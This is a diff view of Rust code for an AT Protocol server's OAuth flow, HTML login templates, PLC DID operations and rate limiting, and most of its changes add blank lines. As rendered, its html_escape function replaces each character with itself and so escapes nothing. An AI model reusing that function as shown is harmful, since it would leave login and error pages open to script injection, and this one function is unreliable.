#[serde(skip_serializing_if = "Option::is_none")]
44
46
pub introspection_endpoint: Option<String>,
45
47
}
48
+
46
49
pub async fn oauth_protected_resource(
47
50
State(_state): State<AppState>,
48
51
) -> Json<ProtectedResourceMetadata> {
···
56
59
resource_documentation: Some("https://atproto.com".to_string()),
57
60
})
58
61
}
62
+
59
63
pub async fn oauth_authorization_server(
60
64
State(_state): State<AppState>,
61
65
) -> Json<AuthorizationServerMetadata> {
···
96
100
introspection_endpoint: Some(format!("{}/oauth/introspect", issuer)),
97
101
})
98
102
}
103
+
99
104
pub async fn oauth_jwks(State(_state): State<AppState>) -> Json<JwkSet> {
100
105
use crate::config::AuthConfig;
101
106
use crate::oauth::jwks::Jwk;
+1
src/oauth/endpoints/mod.rs
+1
src/oauth/endpoints/mod.rs
+6
src/oauth/endpoints/par.rs
+6
src/oauth/endpoints/par.rs
···
11
11
client::ClientMetadataCache,
12
12
db,
13
13
};
14
+
14
15
const PAR_EXPIRY_SECONDS: i64 = 600;
15
16
const SUPPORTED_SCOPES: &[&str] = &["atproto", "transition:generic", "transition:chat.bsky"];
17
+
16
18
#[derive(Debug, Deserialize)]
17
19
pub struct ParRequest {
18
20
pub response_type: String,
···
37
39
#[serde(default)]
38
40
pub client_assertion_type: Option<String>,
39
41
}
42
+
40
43
#[derive(Debug, Serialize)]
41
44
pub struct ParResponse {
42
45
pub request_uri: String,
43
46
pub expires_in: u64,
44
47
}
48
+
45
49
pub async fn pushed_authorization_request(
46
50
State(state): State<AppState>,
47
51
headers: HeaderMap,
···
115
119
expires_in: PAR_EXPIRY_SECONDS as u64,
116
120
}))
117
121
}
122
+
118
123
fn determine_client_auth(request: &ParRequest) -> Result<ClientAuth, OAuthError> {
119
124
if let (Some(assertion), Some(assertion_type)) =
120
125
(&request.client_assertion, &request.client_assertion_type)
···
135
140
}
136
141
Ok(ClientAuth::None)
137
142
}
143
+
138
144
fn validate_scope(
139
145
requested_scope: &Option<String>,
140
146
client_metadata: &crate::oauth::client::ClientMetadata,
+3
src/oauth/endpoints/token/grants.rs
+3
src/oauth/endpoints/token/grants.rs
···
11
11
};
12
12
use super::types::{TokenRequest, TokenResponse};
13
13
use super::helpers::{create_access_token, verify_pkce};
14
+
14
15
const ACCESS_TOKEN_EXPIRY_SECONDS: i64 = 3600;
15
16
const REFRESH_TOKEN_EXPIRY_DAYS: i64 = 60;
17
+
16
18
pub async fn handle_authorization_code_grant(
17
19
state: AppState,
18
20
_headers: HeaderMap,
···
125
127
}),
126
128
))
127
129
}
130
+
128
131
pub async fn handle_refresh_token_grant(
129
132
state: AppState,
130
133
_headers: HeaderMap,
+5
src/oauth/endpoints/token/helpers.rs
+5
src/oauth/endpoints/token/helpers.rs
···
6
6
use subtle::ConstantTimeEq;
7
7
use crate::config::AuthConfig;
8
8
use crate::oauth::OAuthError;
9
+
9
10
const ACCESS_TOKEN_EXPIRY_SECONDS: i64 = 3600;
11
+
10
12
pub struct TokenClaims {
11
13
pub jti: String,
12
14
pub exp: i64,
13
15
pub iat: i64,
14
16
}
17
+
15
18
pub fn verify_pkce(code_challenge: &str, code_verifier: &str) -> Result<(), OAuthError> {
16
19
let mut hasher = Sha256::new();
17
20
hasher.update(code_verifier.as_bytes());
···
22
25
}
23
26
Ok(())
24
27
}
28
+
25
29
pub fn create_access_token(
26
30
token_id: &str,
27
31
sub: &str,
···
60
64
let signature_b64 = URL_SAFE_NO_PAD.encode(&signature);
61
65
Ok(format!("{}.{}", signing_input, signature_b64))
62
66
}
67
+
63
68
pub fn extract_token_claims(token: &str) -> Result<TokenClaims, OAuthError> {
64
69
let parts: Vec<&str> = token.split('.').collect();
65
70
if parts.len() != 3 {
+5
src/oauth/endpoints/token/introspect.rs
+5
src/oauth/endpoints/token/introspect.rs
···
6
6
use crate::state::{AppState, RateLimitKind};
7
7
use crate::oauth::{OAuthError, db};
8
8
use super::helpers::extract_token_claims;
9
+
9
10
#[derive(Debug, Deserialize)]
10
11
pub struct RevokeRequest {
11
12
pub token: Option<String>,
12
13
#[serde(default)]
13
14
pub token_type_hint: Option<String>,
14
15
}
16
+
15
17
pub async fn revoke_token(
16
18
State(state): State<AppState>,
17
19
headers: HeaderMap,
···
31
33
}
32
34
Ok(StatusCode::OK)
33
35
}
36
+
34
37
#[derive(Debug, Deserialize)]
35
38
pub struct IntrospectRequest {
36
39
pub token: String,
37
40
#[serde(default)]
38
41
pub token_type_hint: Option<String>,
39
42
}
43
+
40
44
#[derive(Debug, Serialize)]
41
45
pub struct IntrospectResponse {
42
46
pub active: bool,
···
63
67
#[serde(skip_serializing_if = "Option::is_none")]
64
68
pub jti: Option<String>,
65
69
}
70
+
66
71
pub async fn introspect_token(
67
72
State(state): State<AppState>,
68
73
headers: HeaderMap,
+4
src/oauth/endpoints/token/mod.rs
+4
src/oauth/endpoints/token/mod.rs
···
2
2
mod helpers;
3
3
mod introspect;
4
4
mod types;
5
+
5
6
use axum::{
6
7
Form, Json,
7
8
extract::State,
···
9
10
};
10
11
use crate::state::{AppState, RateLimitKind};
11
12
use crate::oauth::OAuthError;
13
+
12
14
pub use grants::{handle_authorization_code_grant, handle_refresh_token_grant};
13
15
pub use helpers::{create_access_token, extract_token_claims, verify_pkce, TokenClaims};
14
16
pub use introspect::{
15
17
introspect_token, revoke_token, IntrospectRequest, IntrospectResponse, RevokeRequest,
16
18
};
17
19
pub use types::{TokenRequest, TokenResponse};
20
+
18
21
fn extract_client_ip(headers: &HeaderMap) -> String {
19
22
if let Some(forwarded) = headers.get("x-forwarded-for") {
20
23
if let Ok(value) = forwarded.to_str() {
···
30
33
}
31
34
"unknown".to_string()
32
35
}
36
+
33
37
pub async fn token_endpoint(
34
38
State(state): State<AppState>,
35
39
headers: HeaderMap,
+2
src/oauth/endpoints/token/types.rs
+2
src/oauth/endpoints/token/types.rs
···
1
1
use serde::{Deserialize, Serialize};
2
+
2
3
#[derive(Debug, Deserialize)]
3
4
pub struct TokenRequest {
4
5
pub grant_type: String,
···
19
20
#[serde(default)]
20
21
pub client_assertion_type: Option<String>,
21
22
}
23
+
22
24
#[derive(Debug, Serialize)]
23
25
pub struct TokenResponse {
24
26
pub access_token: String,
+5
src/oauth/error.rs
+5
src/oauth/error.rs
···
4
4
response::{IntoResponse, Response},
5
5
};
6
6
use serde::Serialize;
7
+
7
8
#[derive(Debug)]
8
9
pub enum OAuthError {
9
10
InvalidRequest(String),
···
20
21
InvalidToken(String),
21
22
RateLimited,
22
23
}
24
+
23
25
#[derive(Serialize)]
24
26
struct OAuthErrorResponse {
25
27
error: String,
26
28
error_description: Option<String>,
27
29
}
30
+
28
31
impl IntoResponse for OAuthError {
29
32
fn into_response(self) -> Response {
30
33
let (status, error, description) = match self {
···
86
89
.into_response()
87
90
}
88
91
}
92
+
89
93
impl From<sqlx::Error> for OAuthError {
90
94
fn from(err: sqlx::Error) -> Self {
91
95
tracing::error!("Database error in OAuth flow: {}", err);
92
96
OAuthError::ServerError("An internal error occurred".to_string())
93
97
}
94
98
}
99
+
95
100
impl From<anyhow::Error> for OAuthError {
96
101
fn from(err: anyhow::Error) -> Self {
97
102
tracing::error!("Internal error in OAuth flow: {}", err);
+3
src/oauth/jwks.rs
+3
src/oauth/jwks.rs
···
1
1
use serde::{Deserialize, Serialize};
2
+
2
3
#[derive(Debug, Clone, Serialize, Deserialize)]
3
4
pub struct JwkSet {
4
5
pub keys: Vec<Jwk>,
5
6
}
7
+
6
8
#[derive(Debug, Clone, Serialize, Deserialize)]
7
9
pub struct Jwk {
8
10
pub kty: String,
···
19
21
#[serde(skip_serializing_if = "Option::is_none")]
20
22
pub y: Option<String>,
21
23
}
24
+
22
25
pub fn create_jwk_set(keys: Vec<Jwk>) -> JwkSet {
23
26
JwkSet { keys }
24
27
}
+1
src/oauth/mod.rs
+1
src/oauth/mod.rs
+10
src/oauth/templates.rs
+10
src/oauth/templates.rs
···
1
1
use chrono::{DateTime, Utc};
2
+
2
3
fn base_styles() -> &'static str {
3
4
r#"
4
5
:root {
···
340
341
}
341
342
"#
342
343
}
344
+
343
345
pub fn login_page(
344
346
client_id: &str,
345
347
client_name: Option<&str>,
···
411
413
login_hint_value = html_escape(login_hint_value),
412
414
)
413
415
}
416
+
414
417
pub struct DeviceAccount {
415
418
pub did: String,
416
419
pub handle: String,
417
420
pub email: Option<String>,
418
421
pub last_used_at: DateTime<Utc>,
419
422
}
423
+
420
424
pub fn account_selector_page(
421
425
client_id: &str,
422
426
client_name: Option<&str>,
···
482
486
request_uri_encoded = urlencoding::encode(request_uri),
483
487
)
484
488
}
489
+
485
490
pub fn two_factor_page(
486
491
request_uri: &str,
487
492
channel: &str,
···
539
544
error_html = error_html,
540
545
)
541
546
}
547
+
542
548
pub fn error_page(error: &str, error_description: Option<&str>) -> String {
543
549
let description = error_description.unwrap_or("An error occurred during the authorization process.");
544
550
format!(
···
570
576
description = html_escape(description),
571
577
)
572
578
}
579
+
573
580
pub fn success_page(client_name: Option<&str>) -> String {
574
581
let client_display = client_name.unwrap_or("The application");
575
582
format!(
···
597
604
client_display = html_escape(client_display),
598
605
)
599
606
}
607
+
600
608
fn html_escape(s: &str) -> String {
601
609
s.replace('&', "&")
602
610
.replace('<', "<")
···
604
612
.replace('"', """)
605
613
.replace('\'', "'")
606
614
}
615
+
607
616
fn get_initials(handle: &str) -> String {
608
617
let clean = handle.trim_start_matches('@');
609
618
if clean.is_empty() {
···
611
620
}
612
621
clean.chars().next().unwrap_or('?').to_uppercase().to_string()
613
622
}
623
+
614
624
pub fn mask_email(email: &str) -> String {
615
625
if let Some(at_pos) = email.find('@') {
616
626
let local = &email[..at_pos];
+27
src/oauth/types.rs
+27
src/oauth/types.rs
···
1
1
use chrono::{DateTime, Utc};
2
2
use serde::{Deserialize, Serialize};
3
3
use serde_json::Value as JsonValue;
4
+
4
5
#[derive(Debug, Clone, Serialize, Deserialize)]
5
6
pub struct RequestId(pub String);
7
+
6
8
#[derive(Debug, Clone, Serialize, Deserialize)]
7
9
pub struct TokenId(pub String);
10
+
8
11
#[derive(Debug, Clone, Serialize, Deserialize)]
9
12
pub struct DeviceId(pub String);
13
+
10
14
#[derive(Debug, Clone, Serialize, Deserialize)]
11
15
pub struct SessionId(pub String);
16
+
12
17
#[derive(Debug, Clone, Serialize, Deserialize)]
13
18
pub struct Code(pub String);
19
+
14
20
#[derive(Debug, Clone, Serialize, Deserialize)]
15
21
pub struct RefreshToken(pub String);
22
+
16
23
impl RequestId {
17
24
pub fn generate() -> Self {
18
25
Self(format!("urn:ietf:params:oauth:request_uri:{}", uuid::Uuid::new_v4()))
19
26
}
20
27
}
28
+
21
29
impl TokenId {
22
30
pub fn generate() -> Self {
23
31
Self(uuid::Uuid::new_v4().to_string())
24
32
}
25
33
}
34
+
26
35
impl DeviceId {
27
36
pub fn generate() -> Self {
28
37
Self(uuid::Uuid::new_v4().to_string())
29
38
}
30
39
}
40
+
31
41
impl SessionId {
32
42
pub fn generate() -> Self {
33
43
Self(uuid::Uuid::new_v4().to_string())
34
44
}
35
45
}
46
+
36
47
impl Code {
37
48
pub fn generate() -> Self {
38
49
use rand::Rng;
···
43
54
))
44
55
}
45
56
}
57
+
46
58
impl RefreshToken {
47
59
pub fn generate() -> Self {
48
60
use rand::Rng;
···
53
65
))
54
66
}
55
67
}
68
+
56
69
#[derive(Debug, Clone, Serialize, Deserialize)]
57
70
#[serde(tag = "method")]
58
71
pub enum ClientAuth {
···
65
78
#[serde(rename = "private_key_jwt")]
66
79
PrivateKeyJwt { client_assertion: String },
67
80
}
81
+
68
82
#[derive(Debug, Clone, Serialize, Deserialize)]
69
83
pub struct AuthorizationRequestParameters {
70
84
pub response_type: String,
···
79
93
#[serde(flatten)]
80
94
pub extra: Option<JsonValue>,
81
95
}
96
+
82
97
#[derive(Debug, Clone)]
83
98
pub struct RequestData {
84
99
pub client_id: String,
···
89
104
pub device_id: Option<String>,
90
105
pub code: Option<String>,
91
106
}
107
+
92
108
#[derive(Debug, Clone)]
93
109
pub struct DeviceData {
94
110
pub session_id: String,
···
96
112
pub ip_address: String,
97
113
pub last_seen_at: DateTime<Utc>,
98
114
}
115
+
99
116
#[derive(Debug, Clone)]
100
117
pub struct TokenData {
101
118
pub did: String,
···
112
129
pub current_refresh_token: Option<String>,
113
130
pub scope: Option<String>,
114
131
}
132
+
115
133
#[derive(Debug, Clone, Serialize, Deserialize)]
116
134
pub struct AuthorizedClientData {
117
135
pub scope: Option<String>,
118
136
pub remember: bool,
119
137
}
138
+
120
139
#[derive(Debug, Clone, Serialize, Deserialize)]
121
140
pub struct OAuthClientMetadata {
122
141
pub client_id: String,
···
133
152
pub jwks_uri: Option<String>,
134
153
pub application_type: Option<String>,
135
154
}
155
+
136
156
#[derive(Debug, Clone, Serialize, Deserialize)]
137
157
pub struct ProtectedResourceMetadata {
138
158
pub resource: String,
···
141
161
pub scopes_supported: Vec<String>,
142
162
pub resource_documentation: Option<String>,
143
163
}
164
+
144
165
#[derive(Debug, Clone, Serialize, Deserialize)]
145
166
pub struct AuthorizationServerMetadata {
146
167
pub issuer: String,
···
159
180
pub dpop_signing_alg_values_supported: Option<Vec<String>>,
160
181
pub authorization_response_iss_parameter_supported: Option<bool>,
161
182
}
183
+
162
184
#[derive(Debug, Clone, Serialize, Deserialize)]
163
185
pub struct ParResponse {
164
186
pub request_uri: String,
165
187
pub expires_in: u64,
166
188
}
189
+
167
190
#[derive(Debug, Clone, Serialize, Deserialize)]
168
191
pub struct TokenResponse {
169
192
pub access_token: String,
···
176
199
#[serde(skip_serializing_if = "Option::is_none")]
177
200
pub sub: Option<String>,
178
201
}
202
+
179
203
#[derive(Debug, Clone, Serialize, Deserialize)]
180
204
pub struct TokenRequest {
181
205
pub grant_type: String,
···
186
210
pub client_id: Option<String>,
187
211
pub client_secret: Option<String>,
188
212
}
213
+
189
214
#[derive(Debug, Clone, Serialize, Deserialize)]
190
215
pub struct DPoPClaims {
191
216
pub jti: String,
···
197
222
#[serde(skip_serializing_if = "Option::is_none")]
198
223
pub nonce: Option<String>,
199
224
}
225
+
200
226
#[derive(Debug, Clone, Serialize, Deserialize)]
201
227
pub struct JwkPublicKey {
202
228
pub kty: String,
···
208
234
pub kid: Option<String>,
209
235
pub alg: Option<String>,
210
236
}
237
+
211
238
#[derive(Debug, Clone, Serialize, Deserialize)]
212
239
pub struct Jwks {
213
240
pub keys: Vec<JwkPublicKey>,
+14
src/oauth/verify.rs
+14
src/oauth/verify.rs
···
10
10
use sha2::Sha256;
11
11
use sqlx::PgPool;
12
12
use subtle::ConstantTimeEq;
13
+
13
14
use crate::config::AuthConfig;
14
15
use crate::state::AppState;
15
16
use super::db;
16
17
use super::dpop::DPoPVerifier;
17
18
use super::OAuthError;
19
+
18
20
pub struct OAuthTokenInfo {
19
21
pub did: String,
20
22
pub token_id: String,
···
22
24
pub scope: Option<String>,
23
25
pub dpop_jkt: Option<String>,
24
26
}
27
+
25
28
pub struct VerifyResult {
26
29
pub did: String,
27
30
pub token_id: String,
28
31
pub client_id: String,
29
32
pub scope: Option<String>,
30
33
}
34
+
31
35
pub async fn verify_oauth_access_token(
32
36
pool: &PgPool,
33
37
access_token: &str,
···
69
73
scope: token_data.scope,
70
74
})
71
75
}
76
+
72
77
pub fn extract_oauth_token_info(token: &str) -> Result<OAuthTokenInfo, OAuthError> {
73
78
let parts: Vec<&str> = token.split('.').collect();
74
79
if parts.len() != 3 {
···
141
146
dpop_jkt,
142
147
})
143
148
}
149
+
144
150
fn compute_ath(access_token: &str) -> String {
145
151
use sha2::Digest;
146
152
let mut hasher = Sha256::new();
···
148
154
let hash = hasher.finalize();
149
155
URL_SAFE_NO_PAD.encode(&hash)
150
156
}
157
+
151
158
pub fn generate_dpop_nonce() -> String {
152
159
let config = AuthConfig::get();
153
160
let verifier = DPoPVerifier::new(config.dpop_secret().as_bytes());
154
161
verifier.generate_nonce()
155
162
}
163
+
156
164
pub struct OAuthUser {
157
165
pub did: String,
158
166
pub client_id: Option<String>,
159
167
pub scope: Option<String>,
160
168
pub is_oauth: bool,
161
169
}
170
+
162
171
pub struct OAuthAuthError {
163
172
pub status: StatusCode,
164
173
pub error: String,
165
174
pub message: String,
166
175
pub dpop_nonce: Option<String>,
167
176
}
177
+
168
178
impl IntoResponse for OAuthAuthError {
169
179
fn into_response(self) -> Response {
170
180
let mut response = (
···
184
194
response
185
195
}
186
196
}
197
+
187
198
impl FromRequestParts<AppState> for OAuthUser {
188
199
type Rejection = OAuthAuthError;
200
+
189
201
async fn from_request_parts(parts: &mut Parts, state: &AppState) -> Result<Self, Self::Rejection> {
190
202
let auth_header = parts
191
203
.headers
···
258
270
}
259
271
}
260
272
}
273
+
261
274
struct LegacyAuthResult {
262
275
did: String,
263
276
}
277
+
264
278
async fn try_legacy_auth(pool: &PgPool, token: &str) -> Result<LegacyAuthResult, ()> {
265
279
match crate::auth::validate_bearer_token(pool, token).await {
266
280
Ok(user) if !user.is_oauth => Ok(LegacyAuthResult { did: user.did }),
+30
src/plc/mod.rs
+30
src/plc/mod.rs
···
8
8
use std::collections::HashMap;
9
9
use std::time::Duration;
10
10
use thiserror::Error;
11
+
11
12
#[derive(Error, Debug)]
12
13
pub enum PlcError {
13
14
#[error("HTTP request failed: {0}")]
···
27
28
#[error("Service unavailable (circuit breaker open)")]
28
29
CircuitBreakerOpen,
29
30
}
31
+
30
32
#[derive(Debug, Clone, Serialize, Deserialize)]
31
33
pub struct PlcOperation {
32
34
#[serde(rename = "type")]
···
42
44
#[serde(skip_serializing_if = "Option::is_none")]
43
45
pub sig: Option<String>,
44
46
}
47
+
45
48
#[derive(Debug, Clone, Serialize, Deserialize)]
46
49
pub struct PlcService {
47
50
#[serde(rename = "type")]
48
51
pub service_type: String,
49
52
pub endpoint: String,
50
53
}
54
+
51
55
#[derive(Debug, Clone, Serialize, Deserialize)]
52
56
pub struct PlcTombstone {
53
57
#[serde(rename = "type")]
···
56
60
#[serde(skip_serializing_if = "Option::is_none")]
57
61
pub sig: Option<String>,
58
62
}
63
+
59
64
#[derive(Debug, Clone, Serialize, Deserialize)]
60
65
#[serde(untagged)]
61
66
pub enum PlcOpOrTombstone {
62
67
Operation(PlcOperation),
63
68
Tombstone(PlcTombstone),
64
69
}
70
+
65
71
impl PlcOpOrTombstone {
66
72
pub fn is_tombstone(&self) -> bool {
67
73
match self {
···
70
76
}
71
77
}
72
78
}
79
+
73
80
pub struct PlcClient {
74
81
base_url: String,
75
82
client: Client,
76
83
}
84
+
77
85
impl PlcClient {
78
86
pub fn new(base_url: Option<String>) -> Self {
79
87
let base_url = base_url.unwrap_or_else(|| {
···
99
107
client,
100
108
}
101
109
}
110
+
102
111
fn encode_did(did: &str) -> String {
103
112
urlencoding::encode(did).to_string()
104
113
}
114
+
105
115
pub async fn get_document(&self, did: &str) -> Result<Value, PlcError> {
106
116
let url = format!("{}/{}", self.base_url, Self::encode_did(did));
107
117
let response = self.client.get(&url).send().await?;
···
118
128
}
119
129
response.json().await.map_err(|e| PlcError::InvalidResponse(e.to_string()))
120
130
}
131
+
121
132
pub async fn get_document_data(&self, did: &str) -> Result<Value, PlcError> {
122
133
let url = format!("{}/{}/data", self.base_url, Self::encode_did(did));
123
134
let response = self.client.get(&url).send().await?;
···
134
145
}
135
146
response.json().await.map_err(|e| PlcError::InvalidResponse(e.to_string()))
136
147
}
148
+
137
149
pub async fn get_last_op(&self, did: &str) -> Result<PlcOpOrTombstone, PlcError> {
138
150
let url = format!("{}/{}/log/last", self.base_url, Self::encode_did(did));
139
151
let response = self.client.get(&url).send().await?;
···
150
162
}
151
163
response.json().await.map_err(|e| PlcError::InvalidResponse(e.to_string()))
152
164
}
165
+
153
166
pub async fn get_audit_log(&self, did: &str) -> Result<Vec<Value>, PlcError> {
154
167
let url = format!("{}/{}/log/audit", self.base_url, Self::encode_did(did));
155
168
let response = self.client.get(&url).send().await?;
···
166
179
}
167
180
response.json().await.map_err(|e| PlcError::InvalidResponse(e.to_string()))
168
181
}
182
+
169
183
pub async fn send_operation(&self, did: &str, operation: &Value) -> Result<(), PlcError> {
170
184
let url = format!("{}/{}", self.base_url, Self::encode_did(did));
171
185
let response = self.client
···
184
198
Ok(())
185
199
}
186
200
}
201
+
187
202
pub fn cid_for_cbor(value: &Value) -> Result<String, PlcError> {
188
203
let cbor_bytes = serde_ipld_dagcbor::to_vec(value)
189
204
.map_err(|e| PlcError::Serialization(e.to_string()))?;
···
195
210
let cid = cid::Cid::new_v1(0x71, multihash);
196
211
Ok(cid.to_string())
197
212
}
213
+
198
214
pub fn sign_operation(
199
215
operation: &Value,
200
216
signing_key: &SigningKey,
···
213
229
}
214
230
Ok(op)
215
231
}
232
+
216
233
pub fn create_update_op(
217
234
last_op: &PlcOpOrTombstone,
218
235
rotation_keys: Option<Vec<String>>,
···
250
267
};
251
268
serde_json::to_value(new_op).map_err(|e| PlcError::Serialization(e.to_string()))
252
269
}
270
+
253
271
pub fn signing_key_to_did_key(signing_key: &SigningKey) -> String {
254
272
let verifying_key = signing_key.verifying_key();
255
273
let point = verifying_key.to_encoded_point(true);
···
259
277
let encoded = multibase::encode(multibase::Base::Base58Btc, &prefixed);
260
278
format!("did:key:{}", encoded)
261
279
}
280
+
262
281
pub struct GenesisResult {
263
282
pub did: String,
264
283
pub signed_operation: Value,
265
284
}
285
+
266
286
pub fn create_genesis_operation(
267
287
signing_key: &SigningKey,
268
288
rotation_key: &str,
···
298
318
signed_operation: signed_op,
299
319
})
300
320
}
321
+
301
322
pub fn did_for_genesis_op(signed_op: &Value) -> Result<String, PlcError> {
302
323
let cbor_bytes = serde_ipld_dagcbor::to_vec(signed_op)
303
324
.map_err(|e| PlcError::Serialization(e.to_string()))?;
···
308
329
let truncated = &encoded[..24];
309
330
Ok(format!("did:plc:{}", truncated))
310
331
}
332
+
311
333
pub fn validate_plc_operation(op: &Value) -> Result<(), PlcError> {
312
334
let obj = op.as_object()
313
335
.ok_or_else(|| PlcError::InvalidResponse("Operation must be an object".to_string()))?;
···
336
358
}
337
359
Ok(())
338
360
}
361
+
339
362
pub struct PlcValidationContext {
340
363
pub server_rotation_key: String,
341
364
pub expected_signing_key: String,
342
365
pub expected_handle: String,
343
366
pub expected_pds_endpoint: String,
344
367
}
368
+
345
369
pub fn validate_plc_operation_for_submission(
346
370
op: &Value,
347
371
ctx: &PlcValidationContext,
···
407
431
}
408
432
Ok(())
409
433
}
434
+
410
435
pub fn verify_operation_signature(
411
436
op: &Value,
412
437
rotation_keys: &[String],
···
434
459
}
435
460
Ok(false)
436
461
}
462
+
437
463
fn verify_signature_with_did_key(
438
464
did_key: &str,
439
465
message: &[u8],
···
461
487
.map_err(|e| PlcError::InvalidResponse(format!("Invalid public key: {}", e)))?;
462
488
Ok(verifying_key.verify(message, signature).is_ok())
463
489
}
490
+
464
491
#[cfg(test)]
465
492
mod tests {
466
493
use super::*;
494
+
467
495
#[test]
468
496
fn test_signing_key_to_did_key() {
469
497
let key = SigningKey::random(&mut rand::thread_rng());
470
498
let did_key = signing_key_to_did_key(&key);
471
499
assert!(did_key.starts_with("did:key:z"));
472
500
}
501
+
473
502
#[test]
474
503
fn test_cid_for_cbor() {
475
504
let value = json!({
···
479
508
let cid = cid_for_cbor(&value).unwrap();
480
509
assert!(cid.starts_with("bafyrei"));
481
510
}
511
+
482
512
#[test]
483
513
fn test_sign_operation() {
484
514
let key = SigningKey::random(&mut rand::thread_rng());
+34
-5
src/rate_limit.rs
+34
-5
src/rate_limit.rs
···
16
16
num::NonZeroU32,
17
17
sync::Arc,
18
18
};
19
+
19
20
pub type KeyedRateLimiter = RateLimiter<String, DefaultKeyedStateStore<String>, DefaultClock>;
20
21
pub type GlobalRateLimiter = RateLimiter<NotKeyed, InMemoryState, DefaultClock>;
21
-
// NOTE: For production deployments with high traffic, prefer using the distributed rate
22
-
// limiter (Redis/Valkey-based) via AppState::distributed_rate_limiter. The in-memory
23
-
// rate limiters here don't automatically clean up expired entries, which can cause
24
-
// memory growth over time with many unique client IPs. The distributed rate limiter
25
-
// uses Redis TTL for automatic cleanup and works correctly across multiple instances.
22
+
26
23
#[derive(Clone)]
27
24
pub struct RateLimiters {
28
25
pub login: Arc<KeyedRateLimiter>,
···
37
34
pub app_password: Arc<KeyedRateLimiter>,
38
35
pub email_update: Arc<KeyedRateLimiter>,
39
36
}
37
+
40
38
impl Default for RateLimiters {
41
39
fn default() -> Self {
42
40
Self::new()
43
41
}
44
42
}
43
+
45
44
impl RateLimiters {
46
45
pub fn new() -> Self {
47
46
Self {
···
80
79
)),
81
80
}
82
81
}
82
+
83
83
pub fn with_login_limit(mut self, per_minute: u32) -> Self {
84
84
self.login = Arc::new(RateLimiter::keyed(
85
85
Quota::per_minute(NonZeroU32::new(per_minute).unwrap_or(NonZeroU32::new(10).unwrap()))
86
86
));
87
87
self
88
88
}
89
+
89
90
pub fn with_oauth_token_limit(mut self, per_minute: u32) -> Self {
90
91
self.oauth_token = Arc::new(RateLimiter::keyed(
91
92
Quota::per_minute(NonZeroU32::new(per_minute).unwrap_or(NonZeroU32::new(30).unwrap()))
92
93
));
93
94
self
94
95
}
96
+
95
97
pub fn with_oauth_authorize_limit(mut self, per_minute: u32) -> Self {
96
98
self.oauth_authorize = Arc::new(RateLimiter::keyed(
97
99
Quota::per_minute(NonZeroU32::new(per_minute).unwrap_or(NonZeroU32::new(10).unwrap()))
98
100
));
99
101
self
100
102
}
103
+
101
104
pub fn with_password_reset_limit(mut self, per_hour: u32) -> Self {
102
105
self.password_reset = Arc::new(RateLimiter::keyed(
103
106
Quota::per_hour(NonZeroU32::new(per_hour).unwrap_or(NonZeroU32::new(5).unwrap()))
104
107
));
105
108
self
106
109
}
110
+
107
111
pub fn with_account_creation_limit(mut self, per_hour: u32) -> Self {
108
112
self.account_creation = Arc::new(RateLimiter::keyed(
109
113
Quota::per_hour(NonZeroU32::new(per_hour).unwrap_or(NonZeroU32::new(10).unwrap()))
110
114
));
111
115
self
112
116
}
117
+
113
118
pub fn with_email_update_limit(mut self, per_hour: u32) -> Self {
114
119
self.email_update = Arc::new(RateLimiter::keyed(
115
120
Quota::per_hour(NonZeroU32::new(per_hour).unwrap_or(NonZeroU32::new(5).unwrap()))
···
117
122
self
118
123
}
119
124
}
125
+
120
126
pub fn extract_client_ip(headers: &HeaderMap, addr: Option<SocketAddr>) -> String {
121
127
if let Some(forwarded) = headers.get("x-forwarded-for") {
122
128
if let Ok(value) = forwarded.to_str() {
···
125
131
}
126
132
}
127
133
}
134
+
128
135
if let Some(real_ip) = headers.get("x-real-ip") {
129
136
if let Ok(value) = real_ip.to_str() {
130
137
return value.trim().to_string();
131
138
}
132
139
}
140
+
133
141
addr.map(|a| a.ip().to_string()).unwrap_or_else(|| "unknown".to_string())
134
142
}
143
+
135
144
fn rate_limit_response() -> Response {
136
145
(
137
146
StatusCode::TOO_MANY_REQUESTS,
···
142
151
)
143
152
.into_response()
144
153
}
154
+
145
155
pub async fn login_rate_limit(
146
156
ConnectInfo(addr): ConnectInfo<SocketAddr>,
147
157
axum::extract::State(limiters): axum::extract::State<Arc<RateLimiters>>,
···
149
159
next: Next,
150
160
) -> Response {
151
161
let client_ip = extract_client_ip(request.headers(), Some(addr));
162
+
152
163
if limiters.login.check_key(&client_ip).is_err() {
153
164
tracing::warn!(ip = %client_ip, "Login rate limit exceeded");
154
165
return rate_limit_response();
155
166
}
167
+
156
168
next.run(request).await
157
169
}
170
+
158
171
pub async fn oauth_token_rate_limit(
159
172
ConnectInfo(addr): ConnectInfo<SocketAddr>,
160
173
axum::extract::State(limiters): axum::extract::State<Arc<RateLimiters>>,
···
162
175
next: Next,
163
176
) -> Response {
164
177
let client_ip = extract_client_ip(request.headers(), Some(addr));
178
+
165
179
if limiters.oauth_token.check_key(&client_ip).is_err() {
166
180
tracing::warn!(ip = %client_ip, "OAuth token rate limit exceeded");
167
181
return rate_limit_response();
168
182
}
183
+
169
184
next.run(request).await
170
185
}
186
+
171
187
pub async fn password_reset_rate_limit(
172
188
ConnectInfo(addr): ConnectInfo<SocketAddr>,
173
189
axum::extract::State(limiters): axum::extract::State<Arc<RateLimiters>>,
···
175
191
next: Next,
176
192
) -> Response {
177
193
let client_ip = extract_client_ip(request.headers(), Some(addr));
194
+
178
195
if limiters.password_reset.check_key(&client_ip).is_err() {
179
196
tracing::warn!(ip = %client_ip, "Password reset rate limit exceeded");
180
197
return rate_limit_response();
181
198
}
199
+
182
200
next.run(request).await
183
201
}
202
+
184
203
pub async fn account_creation_rate_limit(
185
204
ConnectInfo(addr): ConnectInfo<SocketAddr>,
186
205
axum::extract::State(limiters): axum::extract::State<Arc<RateLimiters>>,
···
188
207
next: Next,
189
208
) -> Response {
190
209
let client_ip = extract_client_ip(request.headers(), Some(addr));
210
+
191
211
if limiters.account_creation.check_key(&client_ip).is_err() {
192
212
tracing::warn!(ip = %client_ip, "Account creation rate limit exceeded");
193
213
return rate_limit_response();
194
214
}
215
+
195
216
next.run(request).await
196
217
}
218
+
197
219
#[cfg(test)]
198
220
mod tests {
199
221
use super::*;
222
+
200
223
#[test]
201
224
fn test_rate_limiters_creation() {
202
225
let limiters = RateLimiters::new();
203
226
assert!(limiters.login.check_key(&"test".to_string()).is_ok());
204
227
}
228
+
205
229
#[test]
206
230
fn test_rate_limiter_exhaustion() {
207
231
let limiter = RateLimiter::keyed(Quota::per_minute(NonZeroU32::new(2).unwrap()));
208
232
let key = "test_ip".to_string();
233
+
209
234
assert!(limiter.check_key(&key).is_ok());
210
235
assert!(limiter.check_key(&key).is_ok());
211
236
assert!(limiter.check_key(&key).is_err());
212
237
}
238
+
213
239
#[test]
214
240
fn test_different_keys_have_separate_limits() {
215
241
